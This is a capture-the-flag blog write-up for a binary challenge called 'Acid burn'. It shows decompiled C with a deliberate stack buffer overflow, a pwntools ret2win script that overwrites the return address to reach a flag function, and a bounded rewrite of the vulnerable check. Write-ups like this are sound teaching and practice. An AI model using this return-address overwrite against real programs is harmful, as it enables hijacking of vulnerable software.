+++
date = '2025-04-28T12:00:00+02:00'
draft = false
title = 'Acid burn'
tags = ['pwn']
+++

Here is the decompiled code for the challenge.
```c
#include <stdio.h>
#include <string.h>

int main(void)
{
  int iVar1;
  char input [64];

  printf("What is the password?\n?: ");
  fflush(stdout);
  /* size argument is 0x80 (128), but input only holds 64 bytes */
  fgets(input,0x80,stdin);
  iVar1 = strcmp(input,"password\n");
  if (iVar1 != 0) {
    puts("incorrect password");
    fflush(stdout);
  }
  return 0;
}
```

`fgets` is told to read up to `0x80` (128) bytes into the 64-byte `input` buffer, so there is a pretty large stack buffer overflow. Conveniently, there is also a function called `flag` that displays the flag (and of course all the protections are disabled).
This is a classic ret2win scenario where we have to overwrite the saved return address to jump to the `flag` function.
A small Python script using pwntools should do the job.
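```python
from pwn import *

# start() and elf are assumed to come from the usual pwntools template
# boilerplate, which is not shown here.
io = start()

payload = flat(
    b'A'*(64+8),             # 64-byte buffer + 8 bytes up to the return address
    pack(elf.symbols.flag))  # address of the flag function

write("payload", payload)    # keep a copy of the payload on disk
io.sendlineafter(b'?: ', payload)
io.interactive()
```

I didn't save the flag, but this works and solves the challenge.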
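
For comparison, here is a bounded version of the password check. It is an added example, not part of the challenge binary or the original write-up. The result codes, `check_password` and the `check_bytes` helper are hypothetical names, and the 128-byte input in `main` is constructed.

```c
#include <stdio.h>
#include <string.h>

/* Result codes (hypothetical names for this example). */
enum { PW_OK, PW_WRONG, PW_TOO_LONG, PW_EOF };

/* Bounded rewrite of the check: the fgets() limit is taken from the buffer
 * itself, so it cannot drift away from the real size of `input`. */
int check_password(FILE *in)
{
    char input[64];
    size_t len;
    int c, truncated = 0;

    if (fgets(input, sizeof input, in) == NULL)
        return PW_EOF;
    len = strcspn(input, "\n");
    if (input[len] != '\n') {
        /* No newline stored: the line did not fit (or input ended).
         * Drain the rest so it is not read as the next answer. */
        while ((c = fgetc(in)) != EOF && c != '\n')
            truncated = 1;
        if (truncated)
            return PW_TOO_LONG;
    }
    input[len] = '\0';
    return strcmp(input, "password") == 0 ? PW_OK : PW_WRONG;
}

/* Demo helper: feed n bytes to check_password() through a temp file. */
int check_bytes(const char *data, size_t n)
{
    FILE *f = tmpfile();
    int r;

    if (f == NULL) return -1;
    fwrite(data, 1, n, f);
    rewind(f);
    r = check_password(f);
    fclose(f);
    return r;
}

int main(void)
{
    char big[0x80];                 /* constructed: 127 'A's plus a newline */
    memset(big, 'A', sizeof big);
    big[sizeof big - 1] = '\n';
    printf("password   -> %d\n", check_bytes("password\n", 9));
    printf("0x80 bytes -> %d\n", check_bytes(big, sizeof big));
    return 0;
}
```

Fixing the length removes the bug itself. Compiler and loader protections such as stack canaries and PIE, which the challenge has disabled, only make the same bug harder to use.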